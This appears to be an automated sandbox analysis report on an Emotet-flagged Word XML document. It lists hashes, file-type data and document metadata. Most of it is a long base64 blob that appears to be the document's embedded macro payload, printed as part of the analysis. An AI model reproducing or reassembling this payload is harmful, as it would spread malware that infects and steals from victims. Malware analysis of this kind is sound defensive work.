File name: | 201901_Untitled_1795.doc |
Full analysis: | https://app.any.run/tasks/d298fb61-4081-4cba-84fb-40ec18c74c94 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 15:27:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 6253EE7DF2CAF80FADF4D39E6F01E956 |
SHA1: | EFDD7A3559D737CF5065AFF1AE031181967C6ABA |
SHA256: | 3D45563F0B8EB2E24BB02A07D8A8DC84C528585AB9E335FD211E04F502FD8378 |
SSDEEP: | 3072:YNGqNPxmmjL/xSu90OoiLuDKZXfwKeljR1z:YNCMxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00802DF5 |
WordDocumentBodySectPRsidRDefault: | 00C25C6E |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | QWN0aXZlTWltZQAAAfAEAAAA/////wAAB/BNQQAABAAAAAQAAAAAAAAAAAAAAACSAAB4nOx7DXhU 1bnu2nt2ksnPhEkMSYj87IS/EUjY/z8M2vlJQsAA4UeINsJMkgmTkJ9JMiGRKt0EiohAU/Uqx9o2 oMfHtmqjtT602t5AraVeS9F6W9qrbcBeD+2xNvZ4+nh7b+WutfbasxdqT9VzntvnPM8dWDNr773e b3/ft77vXd/eC879pGjq+BMVF8D7PtcBD3jvci7Ips4xpOGPHwCWHL93+fJl5/Tl///5T/X5C2w5 ZA45+JsFG5rzJbAJsOXClgdbPmwFsPlgK4Rthh0CoAi2Ytiugq0EtpmwlcJWBls5bLNgq4Dtathm wzYHtrmwzYONh60StirY5sO2ALaFsC2CbTFsAdiuIbothb/LYKuGrQa25bCJsNXCVgebDJsCmwqb BpsOmwGbCdsK2IKwrYTtWhzbAHwKthBsYdgisEXJferh7yrSf+/vOjP/bz4bQR/8k4ZzUQd64e8A uOX9VPBvfkphxDiy8v/GWGFlhXftk68wHuT7Wfa5LdD74Y91xys/XsAwzv2z/sZ9nV/6WjvohDb/ e+7PMrQ/PypO89i/O2G0ajBypU94/wJ4f8TDKHc/6v1RDq/n7D5yBsJ7iAwn/xEneMEH8x/lxH9E /iM5PPho+Y+46MPyXwA2ByBZ/xH573CJwwENsK2GbQ25RyP5XYf8B1sTOd4IXL64gfS3wt9m2G6E 7SZyrgX+3gzbNti2wxaDLQ5bK2xt4O/DOYz0TYvBM88AYQnLjuWCVEl2gweMsqD9NxwHA2E2aBro 60q0pbM2oCkJsSXZbMm1j7F5OWw3U+LNLs5li63P/WDhtiJQwK4pXsnmlQJmYDDd7u/rTlzHzhqE tALzrA90g0QTDL4kWLgNeJaAllWfEQRBEiYUWagGXo6LgjwPW8gUC4Ki3TYfSDXCfGF+dAVo2drZ 2943PAhaBm8ZTCd6ZE5q8SSkmnR3K5i/vrGODw+lrb6eeLqzrxfEPIDdV7eub6An3p0FO1Z0APSA +AarvhDwVlGuxSxZ1hL1FOdlW1aPF4T3Va7v6Ohs279jfS3osCAbtI3u+HKWNe+e0cpVn5Fq64FR KyjRajUC6sPVoiBGqscitXWqtSMcthIVipUlHdxhfWfHQBz08PWd3YnBllC0r6enr5fLXgs62wb6 Bvs6IL1uSsYHEu0tYH19/eponaiBlrWb1tfUNjZmz7/dv28tL2o1gpdf37r3db6xs3ViID5wi7XQ AqWjI961m+onw4PXgcKwxa0Fm0D9/sjgAiCHYNqy7bUKUKW6OrG6Tqg16hkhXG0ArhoIkiYYUaW2 SYhEFK8w7GuvP79WEhoXR+bwk6kXF11aDjOiSpwEtaPsrTmjewqY6Kgg3DZfmBMZnT9ZYIEvqwL4 R5+Ve/skCJershYJyeGwXg3To5pToiBpKKpQHYroar0emdRkrjZ8ULthMDEAJylcu3b1utV7gNgS TqVq42kQb2nsa4t3t4DNiZ5Uy5ZI3fehk/WaxEi7t/2/rPSEqixwoabO9/kpUOH/XA0bO7y2JP+p 8KUZkdc94KrK08zPo7PA3os7tZCmSKsgG/l2ckALYdKsmHl7tnQ4ezbiqIasCCOO/tOjkMrm3lnF 7GWXnchf8EpVFZe99ASY79utiKKRBX9DuSKkDeMrC3wRz3zfKs9y34bly33eP09XLvfpsiF+a6FP D603Yr62it1hz30LfXVwyPFUxdP3tVXkBS75/K3UCsKUMpAv4YlSeNvfwBO/g/1a2N8I28Mel2R/ Hl3wCqLoB+HBQXj8NOwzWJBD25cvrwSo92Cyfir7taXXH/3DzLkNRfyqHuMG6fa2VesOZb067xev jX2gVEdCBiaaeq9jl6796v/e8U712wERUTO6eRah8ky6M15yNAJ/ve+Hvf/WtmJr6xwBtpr2t638 rzPHf+8PWi1YsKkK9ZFTNvkzPXIOrgyk52jPQEITwTrITZgkIEPVgM2QoDrBIFwN+iArD8HzCVwZ 5RIrGWYc3cmymdoPyJ2ZDz4DoT5a7xZSk8zus3FeeCZGjf4grgDjRscDLDqHUGPYQrv/18aj49gV oXGlTu+/1791PgnsNdT5hAApGnJAzofPgRetInCAvRowC+DS3QI2gg7yZwm8uAIu0QmYuSp0rgrF q+DXTEZD5f2x/TE/773AAGeW6EAnkfCVCRBOpwc6W4fSIMFviWxfF4ezy1/LV+3UNF6Rqnx5eVOR ODvIpkS8goDums3JzsHavlDbUE+iN+3bsorv7muNdzMPbEpx8Tamuz7ePZhgCk5EBxLxdLyV7Z45 rwkSfaJtQXccZK9uB/dtHmCHfJG6kVQfHFgyG3FgdzwdStQmBjp3zVwQtYYG0309nbv3R5l94se2 GPEPmEaTA9MdEgxoZG1zV8HjL17BP0/fhwMfXME/uyGNYjr8hB4v+AT1L5qZ+6J2fzes1GR4949v uXt/ZKVDch8Fg54995JQ3g7/bIIh2gR/hU9wf/8nsB/V+ouzP3j/T+IDdH8kymGnj4K5HrZe0s/E TwmJn4OMLehqeHz9cjIIoPj58zS6QkLqQ9evj6rAh5nxUdYr9m+J+c+0XtFaOdrjY3gmv7iGDX3A tVeuMM5vAbl6J75yGHspv3iLx/qY+FuvwNdykx8T33IF/o/clXb+dbzzsRNyP8Zz4IOB9GE+nPwr 59/v5/fr8FEQv/4rMfaRPmgh2sFE9nrdF6iwj0z0kj56iPaTPhrD2/1cdD1AzqMHb4H0UeyH7L4H YRsobDOFjVHYJIUdobAWhR2jsMco3cYp7ATpI9knKfnljCsnwLhyBMYdYzCunAa770HnmyhsjMIm GVeHFIW1SP9lYHOUIz/GunJSrCtnhHXHWKwrZ4x1dThGYR+hsBOsq8NJCnuG9O+CP+eoMUmPK2fE 48qxPK4OBz2unGMeV4dxCjtBYU96XPmTFPacx53H8xT2EoWdpu77LoX1cnb/Afjj59wxE5wrZ5Jz 5ZzhXB3Oca6cKc7V4RKFfZfCYionWG+Wiy3Pcm3ns1yskOVijSxXtxCFbSJ9FKfNlPxpSg7+InK8 2e4Yf7Yrh8929Q9ku1iDwoYobAOFbaawMQqborAjFNaisGOkvwXFADVmmpKDlz9H/xzXD/4cSv8c 14eBHEp/ChvKofSnsM05lP4UNkVhRyisRWHHSB/xyjFKN0xqRI7f68op97pyeK8rR/C6+hsUtoHC NlHYZgqb9Lr6pyisRWEPel3dxijsOOkjvnyEko+rJ0f/XEr/XEr/XEr/XFcHg8I2UNimXFeHZgqb pLApCmtR2IMUdozCjpP+LqQ/6aPCnYcDOWd+8xxh9jLnrEGxPHs8StFknis/lUfpkEfpQI0Zy6N0 yHP1f4TCnqSwk3mu385Q2POkfz/8maLGWPmunLF8V86xfHfMeL4rZyLf1eEkhT1DYc/lu/qfp7CX 8t3Ym6aw+O22k3cFLtZf4GJ50h+DP4ECV7eTBZQOlJxz1JjzlJxLBZQOFBa/mXd08LlYv4/Swedi Az4Xa1DYkM/Vv4HCNpO+heKBkj9FyZmm5LxLjcFfRI6/0PV/eaGLDRS6WKHQxRoUtoHCNlHYGIVN UtgUhbVI/x4Un9QYfoYrR5jhyjFmuGNCM1w5TTNcHZopbJLCpijsCIU9SPqIw8eoMZcoOe9ScnCR 56yDfldOud+dR95P6e+n9Pe78xiisE2k/zDSn5KPd2McHity5ZQXuXL4IleOUOT6waCwDRS2icI2 U9gkhU1RWIvCHqSwYxR2nPRRHfVIETVHxa6cpmJXTnOxOyZW7MpJFbs+HKGwBynsGIU9RmEfIf17 4c8ENabhKldO81WunNhV7pjkVa6ckatcP1gUdozCHrvK9cM4hZ0gfbQBeZL0EZ8LJS6fJ9Gu2ofw eaoEZPh8pMSVb5VQOpRQOpS4+o+XUDqUuPqfpLBnKOw5Cnuewl4qcf0/TWHxLqDDYzNd3fwzXSw/ 043hwExX/rmZrpwpSs4lasw0JQfvNhIdvKUutrzUxfKlLjZQ6mINChuisE0UtpnCxihsivTRi5SR UtfGS5Scdyk5eEfU4YEyV055masDX+ZihTIXa5S58kMUtqnMnbtmCpuksCkKO0JhD5J+DMUJpds0 JQfv4DrzWO6O8ZdT81ju6hAod7EGhQ1R2AYK20z66Nk0Vu7qeZ6Sc4mSM02NeZeS453l6uCf5WL5 WS42MMvFCrNcbIj0R5Fus6g4pORMUXIuUXKmKTl4l9uJwwoqDiuoOKyg4rCCikMKG6KwTRS2ucK9 b4zCpkgfbZKPkD7aQH+kwuWQc+g8xSF0v4rc6zzBos35qfeNd+SgXXx0zDB+2LsXhzUAP4IUlELW AYVdACSWAYuBwCbgscb+Dp5/FK6V14PN8HgFOwteM9g4ZLwozJzLl3H1CkIQdx3GrWS74XGE4HwE V882+xeDWihzC96MsV/R8KAR4tZgXAOUyYN1BHeJ4DbD6xvx9SbWxqG3Jk/DUq9tRcuQKQtmS0rS nob30Vp2qYahtNTUwL8gH47xAnQw3Nnbjo4KQd/woLP9LLW0oXMzQE97TWIkwS9v4xc2DfTtgLjF YAvLg5vYCthrJq8redBC9Cphbb1ibPOyxWAbuY70msDj2vH51gyug+DOMjauK+OnJGvjRrA9+WAg 3lMbT8dX7BGW4WNxIdYInQa2rviquUxayC/fsmL9OnyWBcuj+VB+FVgAeqFc2+7BRJqPbtjSY9t9 bZts9LdIezZo3aFVu9G5XNB8Q2/Tpl3hdSZA6KUUmgWr6/Oxh1fcFhxc/Jm+9NZ4RxSd8YHA5lZl Z881yxO1deoQ0WpErxbW71jWyK/t6rxl+EbswW7WfgjmwQDbXLsYpNgjN9v+SBN//NJj+2OELYfj d8HxzYML8pA/0NsjHtzKNvOLwW62qbgKxjEP9hDcWyQu9kM/jmI/WiywEA69sUL6JK9dUDMQERem 2hct6ugbwNbCyeU7e/mATvwjB2UxqMlB205dCopaUFSCuoDP5AFVD0pwjBaUbA+qQS2oGEFVC+pi UM/H8yMFNTOIoHoQ2N5RdHQgYqyK/XAA6n8r1v8w1PcQ1vcgi+w7Suz5IYmLu9hm72Iwxn4jp/nN b+T0kq1FHtyL/XdPxn/HCG4T8cMDrD1zi8H9MO96yVYmD07A8+P4/JdZdP+HCO5hcr9HcD4+zHbi t0sIh944YSuCkoD+imZQNbGlQWiYhFygSmTOg4rgOAO6QXXOwgPZQKNVE3oU2N51oEExqNp+coAm /GNj84ER1PQgvK9IzuQBEY+C06QhT36NXQG15sHjbPPsxeBR1gTVQIDHE8Suh0g8PZXhkydZDdtV 7kH+OJnx09NsFTz+DsH9C/HjJLz+PXz9WZj9CDeF5+k5HJ+n4bkWgHDPE9w9hAdeYJtLFoMz0I9t hNfQW0jsDQk6QQ1KyFfQKficgE5KOrJVhueJpSi0JGyq4x+IU1QUoMTjuQAFrGwGNRtTCNB1IShL QRViBRuHzsEzmhGU5SCJdHTKhJGMfPgitOJlaOc5bOdZVoT6v0Ls+Wdizy/h9fP4+s9YHdtzHufj rzK4V9ll8HiK4DqI/36TwV0k/hvHuEuZ82/gGfwdwT1J5msaXn8LX3+T7QBO/iPNYXBoIjQJWyti y4jnbK8pQTWoyuivHUHQzZqG/Ks5EYQg8K+ORiwGf2RR/Pwpo887+Phdoo9F8uL/YN75M9uE5xvb j/MJeNA8v8faUcAD1mPjThBctsdZNzmPaNuPcXkeh6e8HgkeFxDcDOI3v8fxa6HH9lsS2PbDtFEU +NeefWgtdIHi5BSyTEEBoolORqqIj0QJR4lIZh+GiALjRrE9hCJDQIGkSJidiuEdSz2Id0o89rYJ D8qJflNkfmZ7nLypgGOQfmdykF28B9UBczO4KoIrILgAxC3yINwCghvDuGUeZ/1b4kG4GoIbIPEn edC6KxC5CIfedtpZgryBqAVFhI57KHGgiQaxFlIv5GzN4Q8RRgSKG5IxdigQtyL7FWi/kdFTw/qs IPqcIvpc53F4dKVjfzayI5KZ7xDG1RLcZ8m8NniaCxaDesqOMYxr9Dg8swbj1hHcjwluI46zJtr+ bLvegcuTgiYPcoiB7YGHdsIjKiBRgOJCRIEAp1oVyLoU1CQUGNBsSK+EqzUYPdCFAiJsSEkkXkS8 gNn5shnrh2qhbjYfanYAf38Nf7+Iv/+Iv4s96FvB35s9CFkD2RDGfxaqL0OZ+nIsC9l/E/ZLcyZu Woj9e0ncxDxovdtG249x7Rl/t2K9OgjuHTJPXR6HR5JkntDOBLLUiQIy/9gjTm4hTylkBYKnsPMg 1ThVgoSWLcXJMNHAOWdijhWdTLR9jb5FwjqSgWYEIm2cYqLbwjFoMTCCdn2UsT+V0bsX2zVA7LqL 8Mouj8NXaWJXA4f8sdvjrHMjGHcrwbUSP1oexGN7KD/6MW6/B9Wno5n7HyC4IIm/Q/j6QQp33qkL RGKoYuLVzIsYWESVk+0/GYeXrEJrM1WChCLMmQCKu5w8JLykYCqD/lXJGAlBUXArNtt7gUQ8iLx3 GObtWCYvj2L77yJ2XCD23+tx6q17iN/8uA64H8fXsYz9DxDc14m/xzN8/GWCO4/rgIewP09kcA8T XCW539c8qJ56hPLbOGvzlonMgzmlKzgXYWkJlyzoTD2oZ9Z2HFaiAByezsQr8WSGtmzOJ+NkfGCQ qEL3wpGJAw356VHop4lM/DyO/fQk0ftOkjdPZ+x9ith7Ca/b38nw/kmMe5bg5hE/TWbWte8R3ATG PZe532mM20/W1zJyvzOZ+z1PcCN4vc+FFaCdfBqpB2EXu86pLu3wgvWhTVuE22R0VtHQ6igFnejB KQmZTLdrAy/ApYQsOZGq49oMFWOZakomxQX0KPbdCx57ns9m1qsXsT3niB++RfLllYyfXib2PILX /fMZ3M8w7pcEt4XEy68yuFcJLkXWfRFbZATtvl3SkFpOQiWPSHgF5R5VTjpcbxfNIi6NMNdM4fv/ JsOfF/HxG0Sfe8l8/i7DJ5dIHTI1A9nxFq4P3vRUARkoqF4juOPEjnfw9T9CDKrusP0zbN41kO6o OjXx04Id6SrRmEQ+UlzMrEoFyPYgbXMuwBU0JIYMp1A2m5lnBeQVaLXiPL9BCfA6JBDC3SoiF8lZ LBXslz950HuKP2fW43c9Laj+I/bdRuwDHKpz3vMg6wRs35lC5BeOc/zJcqgizOZs3DMEl8chnvFy K4AE7HpwDOMKOSdvCribUP1HcLVkHko4tP4Xc7a/8fpXCHCM2qwpYX8GJRTHJjrEjxI6iWN37tHA fMI/mr0gCQ7bOpMgZ1Y+u2ZQ1AyPKEGbtHWHkXRcjBskpkq5BAiDdqhvBeesX+Ucei6YTezZTfKd z/hpLteC7TnoQ35YwKE6oApjkN8XEdxJ4oclnMMjAc6OqyYfIDEC1RBRZGmiXfWp+MDWVMelshP9 NkvCsID5LQs0S5qoKJLtnBGc5zEkmcSZ/TxmIGpBzsnwMGYl9CyGyjHsi2VcJ4oNzsmfGg69N5OI PWtIPGicw3sK14vtsQqQH1ZwTv1pcMPweCXB/QPxX4hD6851HPL2Lvv9V4EdD0FJQXOCp03WcW64 s4S+ndwQ0aO646E8gPMGJ4xTJ9v+kXSSYRomTgnnpWrXKxHOzm9YC8JMP4xrvUfx9wv4ewp//wl/ l3Loexn+jnD4fZoH1YNoV/her5WpB9GOMayTcZ7UcwJ5vl7DXVnXrcv4p5Gzn8caMG4j56z/TVwH qjwJbgfBNXMOv27hejDOj3EtHFqnb4JzsAPUwONtBPctMk+tHHr+iHHd8Gl+q/38l2e/n9MdYhIN OydEEjFkFUFP/PZrIxyPsvOuCfaCohhUbD7DHARrQ6cakh1Okpy3IwahNjxFhCedOXLi0LCnHUU+ qawWg3YO5VEy45cOzEtdxD6W+KU345duko/v5uL3dByq+1LcWvTfZ+BxmuDaST6OZOJ7F5fEuEmM uxX7azeH/un9ADzeQ3C55H6jGX0sgkP/MgL7RcN+Uu1sU/EbD3iM1wrbapk836sZX0EXINcKNrfl 2/ko4sqBMKAikuIbTQReyfdjPxzEeXSAkyCLo/ceh4ie3yXzfjTDY4c5+73HlBfZdxeH3jeNcSg6 EVfdQ3DFxL5jmK/v5ezoxesfxj3AOe+t7+dQ5nyZ4B4jdcMJHPfj3Hr8r+rx+u+16yAnGgzyfHFl vs6wY4Es+tB4p6pGfkJfml2P+1AVZKcxjFARR8hDMIsfyfDqw5invkb06iJ+eDxz/VGSb+fxc/uT mfMTHOKBpwhuNsGdzFx/muDGc0BGM7LemPa825SVT55q4YyhvCHvWmFNgN5RKNTzgr0SCWgIqe80 UqnB5LMxOl7zdNFmq+9ADb+H5+VZqMs6vL5MOvqSeXsOx8NpyB1pyAP4/Sd+Pj/DOc8Nz2P/vMBd +d70LM6TF7mdME9sHj+ZbT8f2eQg4AAOOoyhk3LF4QJdvaa9jx+0ZzKR5of7r60c7q+sRC/ryZgV exY2LRMrF9m2LursQC+vE/1DPJl/lU+0Jft4CFuxp1rVsMXncIyjOHslk98vYz74GdH/t877Pcx/ 57lqWJdIdv7j5+tfceg956tcDTCAhhidu7Le/02mbrlI1uNJjLuE66M3uNtwdsA6kuDiBPcW5oc3 OcQqA3b+Z9n5r1Te2oZ2X9COw0ji/XsYANs1zdn7TPD5H951P15THsLf38Hf5/D3NF5laiGno3Um gN474H/6jPSrYXm4/qBRtXjsu9COP3Esev/HtYE+ZD9n74hNc5n/ZHLx5F/7Tya7FRGIRpUvr36o F7Sh/63Ix2GBpyuBa3x560EvXzcw0DfA+zcmBofAxLrECEj78lK6LKkMSG3sbQ+0SgZnamDjpkR3 og2k+Wh8MMF3TpqG5MvjswC7CBiaL29IlhVWA/rq3nRgUPfqugr0ut52fp8nyIqDoixK0FmNfTsC O2XBGDUKburVNUnxfRqIsi9vWBQUhjGim3p3BNKaV1GVGS07DU2vUkDNxr4hq6VdLjAEpviOln5N EnILl0uy1bHbVEUGzNkc7w0Mq+qocaRmWFcMw5oBqshGG8A7bVX8UsBX2XttKbTZBphRL5M17O3s bWez0Q4bcLbYuJY2NhfvrwFng622bwd4Makro9dtAjt6A+2qqUrHDx8aNgzp6EmV+TTfr8uKbF0f jYC+vu5AnyloVzM7fTfrISU7t0PX2yWzoHyXDsCRm5XT2uTsTkPWT6WZ7oOtkni2TlbUU/NAFdlI G0M7aawpLmT1nL1Zpz2ns/HWmb13dppbHmX2MtHkQEBWrrnj1MbBROgYzMFITma3LGRvl41yzcDZ K7s77DnlU+TTvtX1ozmZ7THv1nhHpLQqsLkVOJtjnDo06sUbY8DZGeOGb5zc1mNohsmwq25JJwJp 3eRUvWDVkCiIZp1vlck822bIzJF6q3Mk0KkoQviGWYe3xaXJQ+GyTemBImuXYQoFZW2qwYo/LpVk w5fXWS6aQvgBy4wEUuWqrOxduLpslyqwcvi3VXgbDDj7YAV9Axdnh65Hm2BcQD/B4A0wL6TQUQZt YVlk+8vD+tHWF89BLmMuesi2V8je6nk9R2pC5H0hW5+frTTDqiYCprLVWKDDE9uytzac7g10Gftl uXv2gKnLhQGgqKovr0/V3pJGZ4cPgArl1PzGwPi6/ZqerbTKgvrY1qZhSRWPBgzrQKrckIQLxeG6 QUmp7G8b0mTzwqFN/ccGAh0h4/dy0hj7VKtyvD+uG5F/qLprmDPEx/PjigLNB2VVaMsqDMQGuFBG tlYF+YD0A6ZabauBXJxVE6tepF4UmBrZqMxSzR/yWhu7PxsWb/u4fUq5FDR5MJ+FNddKPTjpW8jF jAhk8uNATaqCEK+PxoaKE+BLhtSjdhpmgakfvTl8JK6Zxvx4zoNfTyrihom4fEB6sNPa3a5rwo+v WdYhx9i3blZialrndKPyjvVt6UDXJU3Qxn64O5aIqxd6Coa01//bV5/pEjWxWDiSr2khtlXURs3K oWhta3cglHPAvHD2t40dsqy3qs8FJasaPrBVStby6Ima8WvQasIslfUpdr4Yapcq2x+aDIpnYMnA r5CDdStCveN4m+i5LNWSpvD+EB+uZwGbQttCCwancvhsOcyoXYaqmXu39YUGA12Kop1V1AW6vG6O rvB6j8KJWri4ITESGOJk6bMlPN8uCYeMSjY6mTUkm39Zt6BTPauIwngsKR/WtJeUL2S1i+KJ+Ree XZE0RTk8u5L1f2btW7d1pRp7801lYl8yW5k2wYxNnb2B9I63c4XaH2UNGxMF00zV/7JqNHG8VC5p KhNKnpp1qorBT29N5erMk3DdH1trlb8uBqfYLB7oU4wvr0sWOpTjdRfyutSJ3MPX9zcawtg1dx6V DbB/V4lo7D0Q3XBzytQOa+Krebwnreijg7+oWpzWi9hvL9kZGonNuOWZLEW0toduFXNP3bfzRU05 fV9L6U61Lf9EXOgTNf2lZS9kKUL+5A3PZIl+pl/RjO8/kbV3Xqeo6t8dbRLylH5fVawevYo7pERL ZWEmLE3+O3hDGgcvtWvi60x8eUi+PcY0lSoM2nsp9fwjXyMUJRWJb9j50rIfWLOjlduThhHx/ih/ LK2p4q9aTRMEjrXJ6qaVp+pUeUZA4Pnd0uisJ7JapbuFLxbMGVI+n9QN/zX+YVMw7ypKDmwtD3Qa AMybM6jpB0Sm6fjYLkUTitZU35HfyWx8a5XUNHdILTDUl+re/lKHLklv33xPl6pV9abiG8qaWtXB XbpVZp4amW5TjPk/LbWGZS24aZUY3CNOVY/P2ty+r/q5q58olQ+bQuv6Db5uQ5X2v3RNfp9qzijS T80X/PWSGOnvb1cVcL9vIK87MGTGfGOzv7CkzyuJws2BAdmUO88+LUrCmt6U+nJpowWXoSFdkL9y d4zvURTxicDbsdao/9hrpcOKIPVWSebx/B5j2ipadGpbl/Z9/7FnZ/eYirzhduuWy/7S1E1g2ysz p8GG5qnt0zdt95SFZvIsGIstU19p0cqEewTWuk28u0JTgv/KAzVWY4A1r5efmxW6q2y0nv05nzvc +txSfnh16zeX8vIDS/kHR5dex7clp5mX1/0RAHMpb3qqlvJ35e8r/8GrvrzKO15TFUP8/GsJvnrf a/HJVFFLtL+sC5LV0ec7NeXtWV+MGjcye3drfik8MxJ/svMN2f8/50ltJr8oxBZVNnTqyp77Rekn j+uSCqTd0uvDL22P69F9zb9YlNIEeW9+1eV/rYm3iC0bvv+DNeGvyWvGR/7HuYbpMvWns/jZ6lTF U6v/JPqHpypMkVMbX5+zATxWy0qTn7XaJQ+nTH1jpRwE/HTHGDOups3bJ54dLyzK79FNadJ/2x3q rqnHrJo7S/xLhR3ic4qwcCBtatc1857CgSnx1GfvvrdLEeXcnnv6la+U8IamAd8XToK8lGSKCn8t 4KNwhQn0iUCRZVjI1PWCdh5XKGkAyxKe71RMTpCYwxG0Ksd2yyIsB8Y8Fg9w+bJTF1ZKArsFFtoc G1BNC9Ygkqpq2Wm+VVU0s+B7g6ZXkgRQWQWLfYvsIsCyDxYTPCRvlcfbCGyBrABnD4GV2Rn2/gFw NhCKJc9V8KlgblBSvUFF4Ragl+HjeNuAnSEx6kYFLFeCnjpprylaahAWaSnFuuE4qN3UPxCwdihH +/2aKqtH+k1ThirGVVnQrdkArVspQ1eyxYJ+cBCuyobBgKJoBK3RA+W6oltFd4z3ipAUpSM1iqT7 8ry7RMNzvG8wMFygy8zswz/pNlU5W2Zq9l7olSVNCRfU9Ou6YPhgNAqiL68fJgMT3o4Lsi71hHak plUUT1dXTbaH7J0BbovK422ByW49eFbfdxNIgj5RiHrYxDOTidoc2ZOYTJxq0057T8ujLHrhXzsC 2oomPwMXhlBbjySyOrMI8XVSPqPL6mElbU7edUSp1VRLGRal569vLRc1IVxY0LhTlk5L7Hdh2dMF bnyxdHpYhvRTbPXsA5Fv7peMydadoqCN9hvJgUiocF9hQVnSbDT18L5wTZ+6vix1EhYZVvH1ZaP3 doLxttP9od27DCnyi9yyfr8oK+bkLVVG8A2ZXfP9DUYQTJze4fn2S54X4LPZ5E+E5749uX3SflUf 2hr99JuSOfq9SV32sFPM1M5WaR8j60HAWTulQ+brpsJ74QNeCFb+zJTcJSl6ZWWjBcvdpGYIjyV4 SEay8ntZNI5PLtktweW6PGotrxiY2iGNL28M7JL0w5oK5ozmwxrj9zcuioNtZ48Y6pSvXy4Qpb3L 9+Z3iaIUMQ7n71JMpfJTVb8Uj9+hLFjPf167MCcy59cXDjGfH2WYsUqP1Dqv7cB5WPuEAVgmTx5q TbLSqQdRGT8sRfTqGwY0RX98tQIEWLKnDUnNZXP6hkI5HboqRpk53ZWtsJjdy0WTsIwPr1MuLLzm 9rYGUTCPVpqS9Y22M6ao1+fskviuRyvPJ2WpNR+s0WLRUH/1ZINgVRz/RjBUZwY/C+axlfynYuv4 iRPM+OLgvxxaxDdJwfFHFyyY8kRyfjyebT6fe2KRIngap3z/bHlCT4hsnhp/auppcPJLMVYBjbF7 4/H1beNzy01JOfX8V+d2KvKmvbd9PWmY40+0TV4v7rNWXVjYIUuidnjunFB2crLneKhSS8OHFvlI /m49NnJkq6nGx/9rl2ZokSUXT3aMiKY0/YTVdDFtNUUKAh3glrVaq66LP+Vn3lkmS1NbW619ldsB rmaGZejpx+7rV03pQlXVbfNfk/ZuAntGA6Ga0CP6W8Hxpy4yP9wsTXG1XOzNv/DL1OeeCjGp60Jz 91091n85NifE+/tFXrj5X4aUbfzV2Vqq9gJ8oNqpa0x/KSonOhTjafm4NqticHz9uh1aOCz0mppZ 